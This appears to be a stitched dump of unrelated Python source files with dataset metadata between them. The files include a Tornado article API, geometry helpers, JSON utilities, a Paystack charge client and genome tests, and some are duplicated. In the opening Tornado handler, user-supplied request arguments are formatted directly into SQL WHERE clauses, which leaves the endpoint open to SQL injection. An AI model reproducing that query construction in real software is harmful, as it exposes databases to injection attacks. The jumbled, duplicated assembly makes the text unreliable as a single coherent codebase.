authorLogin = self.get_argument('authorLogin', None)
subject1 = self.get_argument('subject1', None)
subject2 = self.get_argument('subject2', None)
subject3 = self.get_argument('subject3', None)
title = self.get_argument('title', None)
tag1 = self.get_argument('tag1', None)
tag2 = self.get_argument('tag2', None)
tag3 = self.get_argument('tag3', None)
filter = self.get_argument('filter', None)
pageable = {
'page': self.get_argument('page', None),
'size': self.get_argument('size', None),
'sort': self.get_arguments('sort'),
}
if uuid is not None:
result = await article_db.get_articles_by_uuid(uuid)
self.write(json.dumps(result))
return
where1 = ''
if authorLogin is not None:
where1 += 'and author_login = "{}" '.format(authorLogin)
if subject1 is not None:
where1 += 'and subject_1 = "{}" '.format(subject1)
if subject2 is not None:
where1 += 'and subject_2 = "{}" '.format(subject2)
if subject3 is not None:
where1 += 'and subject_3 = "{}" '.format(subject3)
if title is not None:
where1 += 'and title = "{}" '.format(title)
if tag1 is not None:
where1 += 'and tag_1 = "{}" '.format(tag1)
if tag2 is not None:
where1 += 'and tag_2 = "{}" '.format(tag2)
if tag3 is not None:
where1 += 'and tag_3 = "{}" '.format(tag3)
where1 = where1[4:]
where2 = ''
if filter is not None:
where2 += 'author_login like "%{}%"'.format(filter)
where2 += ' or author_name like "%{}%"'.format(filter)
where2 += ' or subject_1 like "%{}%"'.format(filter)
where2 += ' or subject_2 like "%{}%"'.format(filter)
where2 += ' or subject_3 like "%{}%"'.format(filter)
where2 += ' or title like "%{}%"'.format(filter)
where2 += ' or tag_1 like "%{}%"'.format(filter)
where2 += ' or tag_2 like "%{}%"'.format(filter)
where2 += ' or tag_3 like "%{}%"'.format(filter)
where = ''
if where1:
where += 'and {}'.format(where1)
if where2:
where += 'and {}'.format(where2)
if where:
where = where[4:]
if where != '':
where = 'WHERE ' + where
total_count, result = await article_db.get_articles(where, pageable)
self.set_header('X-Total-Count', total_count)
self.write(json.dumps(result))
class ArticleApiB(tornado.web.RequestHandler):
async def get(self, id, *args, **kwargs):
token = token_service.get_token(self.request)
has_role = token.has_role('ROLE_CONTENT')
if not has_role:
self.send_error(403)
return
result = await article_db.get_article(id)
self.write(result)
async def delete(self, id, *args, **kwargs):
token = token_service.get_token(self.request)
has_role = token.has_role('ROLE_CONTENT')
if not has_role:
self.send_error(403)
return
await article_db.delete_article(id)
self.set_status(200)
self.finish()
|
none
| 1
| 2.104583
| 2
|
|
pyrival/geometry/lines.py
|
tusshar2000/PyRival
| 1
|
6627627
|
<gh_stars>1-10
import itertools
import math
# 2d line: ax + by + c = 0 is (a, b, c)
# ax + by + c = 0 ((a, b, c),
# 3d line: dx + ez + f = 0 is (d, e, f),
# gy + hz + i = 0 (g, h, i))
def gcd(x, y):
"""greatest common divisor of x and y"""
while y:
x, y = y, x % y
return x
def get_2dline(p1, p2):
if p1 == p2:
return (0, 0, 0)
_p1, _p2 = min(p1, p2), max(p1, p2)
a, b, c = _p2[1] - _p1[1], _p1[0] - _p2[0], _p1[1] * _p2[0] - _p1[0] * _p2[1]
g = gcd(gcd(a, b), c)
return (a // g, b // g, c // g)
dist = lambda p1, p2: sum((a - b) * (a - b) for a, b in zip(p1, p2))**0.5
get_line = lambda p1, p2: map(get_2dline, itertools.combinations(p1, 2), itertools.combinations(p2, 2))
is_parallel = lambda l1, l2: l1[0] * l2[1] == l2[0] * l1[1]
is_same = lambda l1, l2: is_parallel(l1, l2) and (l1[1] * l2[2] == l2[1] * l1[2])
collinear = lambda p1, p2, p3: is_same(get_2dline(p1, p2), get_2dline(p2, p3))
intersect = (lambda l1, l2: None if is_parallel(l1, l2) else (
(l2[1] * l1[2] - l1[1] * l2[2]) / (l2[0] * l1[1] - l1[0] * l2[1]),
(l1[0] * l2[2] - l1[2] * l2[0]) / (l2[0] * l1[1] - l1[0] * l2[1]),
))
rotate = lambda p, theta, origin=(0, 0): (
origin[0] + (p[0] - origin[0]) * math.cos(theta) - (p[1] - origin[1]) * math.sin(theta),
origin[1] + (p[0] - origin[0]) * math.sin(theta) + (p[1] - origin[1]) * math.cos(theta),
)
|
import itertools
import math
# 2d line: ax + by + c = 0 is (a, b, c)
# ax + by + c = 0 ((a, b, c),
# 3d line: dx + ez + f = 0 is (d, e, f),
# gy + hz + i = 0 (g, h, i))
def gcd(x, y):
"""greatest common divisor of x and y"""
while y:
x, y = y, x % y
return x
def get_2dline(p1, p2):
if p1 == p2:
return (0, 0, 0)
_p1, _p2 = min(p1, p2), max(p1, p2)
a, b, c = _p2[1] - _p1[1], _p1[0] - _p2[0], _p1[1] * _p2[0] - _p1[0] * _p2[1]
g = gcd(gcd(a, b), c)
return (a // g, b // g, c // g)
dist = lambda p1, p2: sum((a - b) * (a - b) for a, b in zip(p1, p2))**0.5
get_line = lambda p1, p2: map(get_2dline, itertools.combinations(p1, 2), itertools.combinations(p2, 2))
is_parallel = lambda l1, l2: l1[0] * l2[1] == l2[0] * l1[1]
is_same = lambda l1, l2: is_parallel(l1, l2) and (l1[1] * l2[2] == l2[1] * l1[2])
collinear = lambda p1, p2, p3: is_same(get_2dline(p1, p2), get_2dline(p2, p3))
intersect = (lambda l1, l2: None if is_parallel(l1, l2) else (
(l2[1] * l1[2] - l1[1] * l2[2]) / (l2[0] * l1[1] - l1[0] * l2[1]),
(l1[0] * l2[2] - l1[2] * l2[0]) / (l2[0] * l1[1] - l1[0] * l2[1]),
))
rotate = lambda p, theta, origin=(0, 0): (
origin[0] + (p[0] - origin[0]) * math.cos(theta) - (p[1] - origin[1]) * math.sin(theta),
origin[1] + (p[0] - origin[0]) * math.sin(theta) + (p[1] - origin[1]) * math.cos(theta),
)
|
en
| 0.890085
|
# 2d line: ax + by + c = 0 is (a, b, c) # ax + by + c = 0 ((a, b, c), # 3d line: dx + ez + f = 0 is (d, e, f), # gy + hz + i = 0 (g, h, i)) greatest common divisor of x and y
| 3.479377
| 3
|
monasca_common/rest/utils.py
|
zhangjianweibj/monasca-common
| 0
|
6627628
|
# Copyright 2015 FUJITSU LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
import ujson as json
from monasca_common.rest import exceptions
ENCODING = 'utf8'
TEXT_CONTENT_TYPE = 'text/plain'
JSON_CONTENT_TYPE = 'application/json'
def _try_catch(fun):
@six.wraps(fun)
def wrapper(*args, **kwargs):
try:
return fun(*args, **kwargs)
except Exception as ex:
raise exceptions.DataConversionException(str(ex))
return wrapper
@_try_catch
def as_json(data, **kwargs):
"""Writes data as json.
:param dict data: data to convert to json
:param kwargs kwargs: kwargs for json dumps
:return: json string
:rtype: str
"""
if 'sort_keys' not in kwargs:
kwargs['sort_keys'] = False
if 'ensure_ascii' not in kwargs:
kwargs['ensure_ascii'] = False
data = json.dumps(data, **kwargs)
return data
@_try_catch
def from_json(data, **kwargs):
"""Reads data from json str.
:param str data: data to read
:param kwargs kwargs: kwargs for json loads
:return: read data
:rtype: dict
"""
return json.loads(data, **kwargs)
_READABLE_CONTENT_TYPES = {
TEXT_CONTENT_TYPE: lambda content: content,
JSON_CONTENT_TYPE: from_json
}
def read_body(payload, content_type=JSON_CONTENT_TYPE):
"""Reads HTTP payload according to given content_type.
Function is capable of reading from payload stream.
Read data is then processed according to content_type.
Note:
Content-Type is validated. It means that if read_body
body is not capable of reading data in requested type,
it will throw an exception.
If read data was empty method will return false boolean
value to indicate that.
Note:
There is no transformation if content type is equal to
'text/plain'. What has been read is returned.
:param stream payload: payload to read, payload should have read method
:param str content_type: payload content type, default to application/json
:return: read data, returned type depends on content_type or False
if empty
:exception: :py:class:`.UnreadableBody` - in case of any failure when
reading data
"""
if content_type not in _READABLE_CONTENT_TYPES:
msg = ('Cannot read %s, not in %s' %
(content_type, _READABLE_CONTENT_TYPES))
raise exceptions.UnsupportedContentTypeException(msg)
try:
content = payload.read()
if not content:
return None
except Exception as ex:
raise exceptions.UnreadableContentError(str(ex))
return _READABLE_CONTENT_TYPES[content_type](content)
|
# Copyright 2015 FUJITSU LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
import ujson as json
from monasca_common.rest import exceptions
ENCODING = 'utf8'
TEXT_CONTENT_TYPE = 'text/plain'
JSON_CONTENT_TYPE = 'application/json'
def _try_catch(fun):
@six.wraps(fun)
def wrapper(*args, **kwargs):
try:
return fun(*args, **kwargs)
except Exception as ex:
raise exceptions.DataConversionException(str(ex))
return wrapper
@_try_catch
def as_json(data, **kwargs):
"""Writes data as json.
:param dict data: data to convert to json
:param kwargs kwargs: kwargs for json dumps
:return: json string
:rtype: str
"""
if 'sort_keys' not in kwargs:
kwargs['sort_keys'] = False
if 'ensure_ascii' not in kwargs:
kwargs['ensure_ascii'] = False
data = json.dumps(data, **kwargs)
return data
@_try_catch
def from_json(data, **kwargs):
"""Reads data from json str.
:param str data: data to read
:param kwargs kwargs: kwargs for json loads
:return: read data
:rtype: dict
"""
return json.loads(data, **kwargs)
_READABLE_CONTENT_TYPES = {
TEXT_CONTENT_TYPE: lambda content: content,
JSON_CONTENT_TYPE: from_json
}
def read_body(payload, content_type=JSON_CONTENT_TYPE):
"""Reads HTTP payload according to given content_type.
Function is capable of reading from payload stream.
Read data is then processed according to content_type.
Note:
Content-Type is validated. It means that if read_body
body is not capable of reading data in requested type,
it will throw an exception.
If read data was empty method will return false boolean
value to indicate that.
Note:
There is no transformation if content type is equal to
'text/plain'. What has been read is returned.
:param stream payload: payload to read, payload should have read method
:param str content_type: payload content type, default to application/json
:return: read data, returned type depends on content_type or False
if empty
:exception: :py:class:`.UnreadableBody` - in case of any failure when
reading data
"""
if content_type not in _READABLE_CONTENT_TYPES:
msg = ('Cannot read %s, not in %s' %
(content_type, _READABLE_CONTENT_TYPES))
raise exceptions.UnsupportedContentTypeException(msg)
try:
content = payload.read()
if not content:
return None
except Exception as ex:
raise exceptions.UnreadableContentError(str(ex))
return _READABLE_CONTENT_TYPES[content_type](content)
|
en
| 0.802362
|
# Copyright 2015 FUJITSU LIMITED # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. Writes data as json. :param dict data: data to convert to json :param kwargs kwargs: kwargs for json dumps :return: json string :rtype: str Reads data from json str. :param str data: data to read :param kwargs kwargs: kwargs for json loads :return: read data :rtype: dict Reads HTTP payload according to given content_type. Function is capable of reading from payload stream. Read data is then processed according to content_type. Note: Content-Type is validated. It means that if read_body body is not capable of reading data in requested type, it will throw an exception. If read data was empty method will return false boolean value to indicate that. Note: There is no transformation if content type is equal to 'text/plain'. What has been read is returned. :param stream payload: payload to read, payload should have read method :param str content_type: payload content type, default to application/json :return: read data, returned type depends on content_type or False if empty :exception: :py:class:`.UnreadableBody` - in case of any failure when reading data
| 1.870754
| 2
|
src/labeling/common.py
|
ZendriXXX/CMF
| 0
|
6627629
|
from enum import Enum
class LabelTypes(Enum):
NEXT_ACTIVITY = 'next_activity'
ATTRIBUTE_STRING = 'label_attribute_string'
def add_label_column(trace, labeling_type, prefix_length: int):
"""TODO COMMENT ME
"""
if labeling_type == LabelTypes.NEXT_ACTIVITY.value:
return next_event_name(trace, prefix_length)
elif labeling_type == LabelTypes.ATTRIBUTE_STRING.value:
return trace.attributes['label']
else:
raise Exception('Label not set please select one of LabelTypes(Enum) values!')
def next_event_name(trace: list, prefix_length: int):
"""Return the event event_name at prefix length or 0 if out of range.
"""
if prefix_length < len(trace):
next_event = trace[prefix_length]
name = next_event['concept:name']
return name
else:
return 0
|
from enum import Enum
class LabelTypes(Enum):
NEXT_ACTIVITY = 'next_activity'
ATTRIBUTE_STRING = 'label_attribute_string'
def add_label_column(trace, labeling_type, prefix_length: int):
"""TODO COMMENT ME
"""
if labeling_type == LabelTypes.NEXT_ACTIVITY.value:
return next_event_name(trace, prefix_length)
elif labeling_type == LabelTypes.ATTRIBUTE_STRING.value:
return trace.attributes['label']
else:
raise Exception('Label not set please select one of LabelTypes(Enum) values!')
def next_event_name(trace: list, prefix_length: int):
"""Return the event event_name at prefix length or 0 if out of range.
"""
if prefix_length < len(trace):
next_event = trace[prefix_length]
name = next_event['concept:name']
return name
else:
return 0
|
en
| 0.466859
|
TODO COMMENT ME Return the event event_name at prefix length or 0 if out of range.
| 3.046031
| 3
|
src/tests/test_with_function.py
|
sjsumitj/pytest_tutorial
| 1
|
6627630
|
import pytest
from ..sum import *
#make sure to start function name with test
def test_sum():
assert sum(1, 2) == 3
|
import pytest
from ..sum import *
#make sure to start function name with test
def test_sum():
assert sum(1, 2) == 3
|
en
| 0.877947
|
#make sure to start function name with test
| 2.553595
| 3
|
src/sadie/typing/species.py
|
jwillis0720/pybody
| 0
|
6627631
|
from collections import UserString
from typing import Callable, Generator
from pydantic.fields import ModelField
# TODO: go through and see which are viable to use; tests need to be fixed first in test_g3 to handle this
SPECIES = {
"rhesus": "macaque",
"homo_sapiens": "human",
"mus": "mouse",
"rattus_norvegicus": "rat",
"oryctolagus_cuniculus": "rabbit",
"macaca_mulatta": "rhesus",
"sus_scrofa": "pig",
"vicugna_pacos": "alpaca",
"bos_taurus": "cow",
"alpaca": "alpaca",
"human": "human",
"macaque": "macaque",
"mouse": "mouse",
"rabbit": "rabbit",
"dog": "dog",
"cat": "cat",
"rat": "rat",
"pig": "pig",
# 'amberjack': 'amberjack',
# 'bass': 'bass',
# 'boar': 'boar',
# 'bull_shark': 'bull_shark',
# 'camel': 'camel',
# 'carp': 'carp',
# 'catfish': 'catfish',
# 'char': 'char',
# 'chinese_perch': 'chinese_perch',
# 'clearnose_skate': 'clearnose_skate',
# 'cod': 'cod',
# 'crab_eating_macaque': 'crab_eating_macaque',
# 'dolphin': 'dolphin',
# 'ferret': 'ferret',
# 'flounder': 'flounder',
# 'goat': 'goat',
# 'goldfish': 'goldfish',
# 'horn_shark': 'horn_shark',
# 'horse': 'horse',
# 'icefish': 'icefish',
# 'junglefowl': 'junglefowl',
# 'ladyfish': 'ladyfish',
# 'little_skate': 'little_skate',
# 'night_monkey': 'night_monkey',
# 'nurse_shark': 'nurse_shark',
# 'platypus': 'platypus',
# 'pufferfish': 'pufferfish',
# 'ratfish': 'ratfish',
# 'rockcod': 'rockcod',
# 'salmon': 'salmon',
# 'sandbar_shark': 'sandbar_shark',
# 'shark': 'shark',
# 'sheep': 'sheep',
# 'spotted_wolffish': 'spotted_wolffish',
# 'trout': 'trout',
# 'tubot': 'tubot',
# 'wobbegong': 'wobbegong',
# 'zebrafish': 'zebrafish',
}
class Species(UserString):
species = SPECIES
@classmethod
def __get_validators__(cls) -> Generator[Callable[[str, ModelField], str], None, None]:
yield cls.validate
@classmethod
def validate(cls, value: str, field: ModelField) -> str:
if not isinstance(value, str):
raise ValueError(f"{field} [{value}] must be a string")
value = value.strip().lower().replace(" ", "_")
if value not in SPECIES:
raise ValueError(f"{field} [{value}] must be in {SPECIES.keys()}")
value = SPECIES[value]
return value
|
from collections import UserString
from typing import Callable, Generator
from pydantic.fields import ModelField
# TODO: go through and see which are viable to use; tests need to be fixed first in test_g3 to handle this
SPECIES = {
"rhesus": "macaque",
"homo_sapiens": "human",
"mus": "mouse",
"rattus_norvegicus": "rat",
"oryctolagus_cuniculus": "rabbit",
"macaca_mulatta": "rhesus",
"sus_scrofa": "pig",
"vicugna_pacos": "alpaca",
"bos_taurus": "cow",
"alpaca": "alpaca",
"human": "human",
"macaque": "macaque",
"mouse": "mouse",
"rabbit": "rabbit",
"dog": "dog",
"cat": "cat",
"rat": "rat",
"pig": "pig",
# 'amberjack': 'amberjack',
# 'bass': 'bass',
# 'boar': 'boar',
# 'bull_shark': 'bull_shark',
# 'camel': 'camel',
# 'carp': 'carp',
# 'catfish': 'catfish',
# 'char': 'char',
# 'chinese_perch': 'chinese_perch',
# 'clearnose_skate': 'clearnose_skate',
# 'cod': 'cod',
# 'crab_eating_macaque': 'crab_eating_macaque',
# 'dolphin': 'dolphin',
# 'ferret': 'ferret',
# 'flounder': 'flounder',
# 'goat': 'goat',
# 'goldfish': 'goldfish',
# 'horn_shark': 'horn_shark',
# 'horse': 'horse',
# 'icefish': 'icefish',
# 'junglefowl': 'junglefowl',
# 'ladyfish': 'ladyfish',
# 'little_skate': 'little_skate',
# 'night_monkey': 'night_monkey',
# 'nurse_shark': 'nurse_shark',
# 'platypus': 'platypus',
# 'pufferfish': 'pufferfish',
# 'ratfish': 'ratfish',
# 'rockcod': 'rockcod',
# 'salmon': 'salmon',
# 'sandbar_shark': 'sandbar_shark',
# 'shark': 'shark',
# 'sheep': 'sheep',
# 'spotted_wolffish': 'spotted_wolffish',
# 'trout': 'trout',
# 'tubot': 'tubot',
# 'wobbegong': 'wobbegong',
# 'zebrafish': 'zebrafish',
}
class Species(UserString):
species = SPECIES
@classmethod
def __get_validators__(cls) -> Generator[Callable[[str, ModelField], str], None, None]:
yield cls.validate
@classmethod
def validate(cls, value: str, field: ModelField) -> str:
if not isinstance(value, str):
raise ValueError(f"{field} [{value}] must be a string")
value = value.strip().lower().replace(" ", "_")
if value not in SPECIES:
raise ValueError(f"{field} [{value}] must be in {SPECIES.keys()}")
value = SPECIES[value]
return value
|
en
| 0.130891
|
# TODO: go through and see which are viable to use; tests need to be fixed first in test_g3 to handle this # 'amberjack': 'amberjack', # 'bass': 'bass', # 'boar': 'boar', # 'bull_shark': 'bull_shark', # 'camel': 'camel', # 'carp': 'carp', # 'catfish': 'catfish', # 'char': 'char', # 'chinese_perch': 'chinese_perch', # 'clearnose_skate': 'clearnose_skate', # 'cod': 'cod', # 'crab_eating_macaque': 'crab_eating_macaque', # 'dolphin': 'dolphin', # 'ferret': 'ferret', # 'flounder': 'flounder', # 'goat': 'goat', # 'goldfish': 'goldfish', # 'horn_shark': 'horn_shark', # 'horse': 'horse', # 'icefish': 'icefish', # 'junglefowl': 'junglefowl', # 'ladyfish': 'ladyfish', # 'little_skate': 'little_skate', # 'night_monkey': 'night_monkey', # 'nurse_shark': 'nurse_shark', # 'platypus': 'platypus', # 'pufferfish': 'pufferfish', # 'ratfish': 'ratfish', # 'rockcod': 'rockcod', # 'salmon': 'salmon', # 'sandbar_shark': 'sandbar_shark', # 'shark': 'shark', # 'sheep': 'sheep', # 'spotted_wolffish': 'spotted_wolffish', # 'trout': 'trout', # 'tubot': 'tubot', # 'wobbegong': 'wobbegong', # 'zebrafish': 'zebrafish',
| 2.589187
| 3
|
node_map.py
|
couchbase/healthchecker
| 2
|
6627632
|
address_map = {
"10.12.87.41" : "2172.16.58.33",
"10.12.95.171" : "192.168.3.11",
"10.194.169.187" : "192.168.127.12",
"10.12.98.26" : "23.20.50.242",
"10.144.64.38" : "192.168.3.11",
"10.12.97.189" : "172.16.58.3",
}
|
address_map = {
"10.12.87.41" : "2172.16.58.33",
"10.12.95.171" : "192.168.3.11",
"10.194.169.187" : "192.168.127.12",
"10.12.98.26" : "23.20.50.242",
"10.144.64.38" : "192.168.3.11",
"10.12.97.189" : "172.16.58.3",
}
|
none
| 1
| 1.563335
| 2
|
|
src/spaceone/inventory/manager/__init__.py
|
jean1042/plugin-aws-cloud-services
| 2
|
6627633
|
from spaceone.inventory.manager.cloudfront_manager import CloudFrontConnectorManager
from spaceone.inventory.manager.lambda_manager import LambdaConnectorManager
from spaceone.inventory.manager.rds_manager import RDSConnectorManager
from spaceone.inventory.manager.api_gateway_manager import APIGatewayConnectorManager
from spaceone.inventory.manager.auto_scaling_manager import AutoScalingConnectorManager
from spaceone.inventory.manager.direct_connect_manager import DirectConnectConnectorManager
from spaceone.inventory.manager.documentdb_manager import DocumentDBConnectorManager
from spaceone.inventory.manager.ecs_manager import ECSConnectorManager
from spaceone.inventory.manager.ecr_manager import ECRConnectorManager
from spaceone.inventory.manager.efs_manager import EFSConnectorManager
from spaceone.inventory.manager.eks_manager import EKSConnectorManager
from spaceone.inventory.manager.redshift_manager import RedshiftConnectorManager
from spaceone.inventory.manager.route53_manager import Route53ConnectorManager
from spaceone.inventory.manager.elasticache_manager import ElastiCacheConnectorManager
from spaceone.inventory.manager.sqs_manager import SQSConnectorManager
from spaceone.inventory.manager.kms_manager import KMSConnectorManager
from spaceone.inventory.manager.cloudtrail_manager import CloudTrailConnectorManager
from spaceone.inventory.manager.sns_manager import SNSConnectorManager
from spaceone.inventory.manager.secrets_manager import SecretsManagerConnectorManager
from spaceone.inventory.manager.elb_manager import ELBConnectorManager
from spaceone.inventory.manager.eip_manager import EIPConnectorManager
from spaceone.inventory.manager.ebs_manager import EBSConnectorManager
from spaceone.inventory.manager.s3_manager import S3ConnectorManager
from spaceone.inventory.manager.dynamodb_manager import DynamoDBConnectorManager
from spaceone.inventory.manager.vpc_manager import VPCConnectorManager
from spaceone.inventory.manager.ec2_manager import EC2ConnectorManager
from spaceone.inventory.manager.iam_manager import IAMConnectorManager
from spaceone.inventory.manager.acm_manager import ACMConnectorManager
from spaceone.inventory.manager.kinesis_data_stream_manager import KinesisDataStreamConnectorManager
from spaceone.inventory.manager.msk_manager import MSKConnectorManager
from spaceone.inventory.manager.kinesis_firehose_manager import KinesisFirehoseConnectorManager
# from spaceone.inventory.manager.workspace_manager import WorkspaceCollectorManager
|
from spaceone.inventory.manager.cloudfront_manager import CloudFrontConnectorManager
from spaceone.inventory.manager.lambda_manager import LambdaConnectorManager
from spaceone.inventory.manager.rds_manager import RDSConnectorManager
from spaceone.inventory.manager.api_gateway_manager import APIGatewayConnectorManager
from spaceone.inventory.manager.auto_scaling_manager import AutoScalingConnectorManager
from spaceone.inventory.manager.direct_connect_manager import DirectConnectConnectorManager
from spaceone.inventory.manager.documentdb_manager import DocumentDBConnectorManager
from spaceone.inventory.manager.ecs_manager import ECSConnectorManager
from spaceone.inventory.manager.ecr_manager import ECRConnectorManager
from spaceone.inventory.manager.efs_manager import EFSConnectorManager
from spaceone.inventory.manager.eks_manager import EKSConnectorManager
from spaceone.inventory.manager.redshift_manager import RedshiftConnectorManager
from spaceone.inventory.manager.route53_manager import Route53ConnectorManager
from spaceone.inventory.manager.elasticache_manager import ElastiCacheConnectorManager
from spaceone.inventory.manager.sqs_manager import SQSConnectorManager
from spaceone.inventory.manager.kms_manager import KMSConnectorManager
from spaceone.inventory.manager.cloudtrail_manager import CloudTrailConnectorManager
from spaceone.inventory.manager.sns_manager import SNSConnectorManager
from spaceone.inventory.manager.secrets_manager import SecretsManagerConnectorManager
from spaceone.inventory.manager.elb_manager import ELBConnectorManager
from spaceone.inventory.manager.eip_manager import EIPConnectorManager
from spaceone.inventory.manager.ebs_manager import EBSConnectorManager
from spaceone.inventory.manager.s3_manager import S3ConnectorManager
from spaceone.inventory.manager.dynamodb_manager import DynamoDBConnectorManager
from spaceone.inventory.manager.vpc_manager import VPCConnectorManager
from spaceone.inventory.manager.ec2_manager import EC2ConnectorManager
from spaceone.inventory.manager.iam_manager import IAMConnectorManager
from spaceone.inventory.manager.acm_manager import ACMConnectorManager
from spaceone.inventory.manager.kinesis_data_stream_manager import KinesisDataStreamConnectorManager
from spaceone.inventory.manager.msk_manager import MSKConnectorManager
from spaceone.inventory.manager.kinesis_firehose_manager import KinesisFirehoseConnectorManager
# from spaceone.inventory.manager.workspace_manager import WorkspaceCollectorManager
|
en
| 0.393256
|
# from spaceone.inventory.manager.workspace_manager import WorkspaceCollectorManager
| 1.026564
| 1
|
paystacklib/api/charge.py
|
abimbola/paystack-lib-python
| 0
|
6627634
|
import paystacklib
from paystacklib.base.baseapi import BaseApi
from paystacklib.util.utils import clean_params
class Charge(BaseApi):
object_type = '/charge'
def __init__(
self, secret_key=None,
uri=paystacklib.api_base + object_type, method=None,
headers=None, params=None):
BaseApi.__init__(self, secret_key, uri, method, headers, params)
@classmethod
def charge(
cls, amount, email,
bank_code=None, bank_account_number=None,
authorization_code=None, pin=None, metadata=None, reference=None,
ussd_type=None, mobile_money=None, device_id=None):
bank_object = None
ussd_object = None
if bank_code and bank_account_number:
bank_object = {}
bank_object['code'] = str(bank_code)
bank_object['account_number'] = str(bank_account_number)
if ussd_type:
ussd_object = {}
ussd_object['type'] = ussd_type
params = {'amount': amount, 'email': email, 'bank': bank_object,
'authorization_code': authorization_code, 'pin': pin,
'metadata': metadata, 'reference': reference, 'ussd': ussd_object,
'mobile_money': mobile_money, 'device_id': device_id}
params = clean_params(params)
uri = paystacklib.api_base + cls.object_type
return cls(uri=uri, method='post', params=params).execute()
@classmethod
def submit_pin(cls, pin, reference):
params = clean_params(locals())
uri = paystacklib.api_base + cls.object_type + '/submit_pin'
return cls(uri=uri, method='post', params=params).execute()
@classmethod
def submit_otp(cls, otp, reference):
params = clean_params(locals())
uri = paystacklib.api_base + cls.object_type + '/submit_otp'
return cls(uri=uri, method='post', params=params).execute()
@classmethod
def submit_phone(cls, phone, reference):
params = clean_params(locals())
uri = paystacklib.api_base + cls.object_type + '/submit_phone'
return cls(uri=uri, method='post', params=params).execute()
@classmethod
def submit_birthday(cls, birthday, reference):
params = clean_params(locals())
uri = paystacklib.api_base + cls.object_type + '/submit_birthday'
return cls(uri=uri, method='post', params=params).execute()
@classmethod
def check_pending_charge(cls, reference):
uri = paystacklib.api_base + \
'{0}/{1}'.format(cls.object_type, str(reference))
return cls(uri=uri, method='get').execute()
|
import paystacklib
from paystacklib.base.baseapi import BaseApi
from paystacklib.util.utils import clean_params
class Charge(BaseApi):
object_type = '/charge'
def __init__(
self, secret_key=None,
uri=paystacklib.api_base + object_type, method=None,
headers=None, params=None):
BaseApi.__init__(self, secret_key, uri, method, headers, params)
@classmethod
def charge(
cls, amount, email,
bank_code=None, bank_account_number=None,
authorization_code=None, pin=None, metadata=None, reference=None,
ussd_type=None, mobile_money=None, device_id=None):
bank_object = None
ussd_object = None
if bank_code and bank_account_number:
bank_object = {}
bank_object['code'] = str(bank_code)
bank_object['account_number'] = str(bank_account_number)
if ussd_type:
ussd_object = {}
ussd_object['type'] = ussd_type
params = {'amount': amount, 'email': email, 'bank': bank_object,
'authorization_code': authorization_code, 'pin': pin,
'metadata': metadata, 'reference': reference, 'ussd': ussd_object,
'mobile_money': mobile_money, 'device_id': device_id}
params = clean_params(params)
uri = paystacklib.api_base + cls.object_type
return cls(uri=uri, method='post', params=params).execute()
@classmethod
def submit_pin(cls, pin, reference):
params = clean_params(locals())
uri = paystacklib.api_base + cls.object_type + '/submit_pin'
return cls(uri=uri, method='post', params=params).execute()
@classmethod
def submit_otp(cls, otp, reference):
params = clean_params(locals())
uri = paystacklib.api_base + cls.object_type + '/submit_otp'
return cls(uri=uri, method='post', params=params).execute()
@classmethod
def submit_phone(cls, phone, reference):
params = clean_params(locals())
uri = paystacklib.api_base + cls.object_type + '/submit_phone'
return cls(uri=uri, method='post', params=params).execute()
@classmethod
def submit_birthday(cls, birthday, reference):
params = clean_params(locals())
uri = paystacklib.api_base + cls.object_type + '/submit_birthday'
return cls(uri=uri, method='post', params=params).execute()
@classmethod
def check_pending_charge(cls, reference):
uri = paystacklib.api_base + \
'{0}/{1}'.format(cls.object_type, str(reference))
return cls(uri=uri, method='get').execute()
|
none
| 1
| 2.219899
| 2
|
|
test/utility/genome_size_tests.py
|
samseaver/GenomeFileUtil
| 0
|
6627635
|
<filename>test/utility/genome_size_tests.py
import os
import shutil
import time
import unittest
import mock
from configparser import ConfigParser
from installed_clients.DataFileUtilClient import DataFileUtil
from GenomeFileUtil.GenomeFileUtilImpl import GenomeFileUtil
from GenomeFileUtil.GenomeFileUtilServer import MethodContext
from GenomeFileUtil.core.GenomeInterface import GenomeInterface
from installed_clients.WorkspaceClient import Workspace as workspaceService
class GenomeFileUtilTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
token = os.environ.get('KB_AUTH_TOKEN', None)
# WARNING: don't call any logging methods on the context object,
# it'll result in a NoneType error
cls.ctx = MethodContext(None)
cls.ctx.update({'token': token,
'provenance': [
{'service': 'GenomeFileUtil',
'method': 'please_never_use_it_in_production',
'method_params': []
}],
'authenticated': 1})
config_file = os.environ.get('KB_DEPLOYMENT_CONFIG', None)
cls.cfg = {}
config = ConfigParser()
config.read(config_file)
for nameval in config.items('GenomeFileUtil'):
cls.cfg[nameval[0]] = nameval[1]
cls.wsURL = cls.cfg['workspace-url']
cls.wsClient = workspaceService(cls.wsURL, token=token)
cls.serviceImpl = GenomeFileUtil(cls.cfg)
cls.token = token
@classmethod
def tearDownClass(cls):
if hasattr(cls, 'wsName'):
cls.wsClient.delete_workspace({'workspace': cls.wsName})
print('Test workspace was deleted')
def getWsClient(self):
return self.__class__.wsClient
def getWsName(self):
if hasattr(self.__class__, 'wsName'):
return self.__class__.wsName
suffix = int(time.time() * 1000)
wsName = "test_GenomeFileUtil_" + str(suffix)
self.getWsClient().create_workspace({'workspace': wsName})
self.__class__.wsName = wsName
return wsName
def getImpl(self):
return self.__class__.serviceImpl
def getContext(self):
return self.__class__.ctx
def test_full_sequence(self):
# features should not have sequences in it. But both non_coding_features and CDSs should have sequences.
print("test_full_sequence")
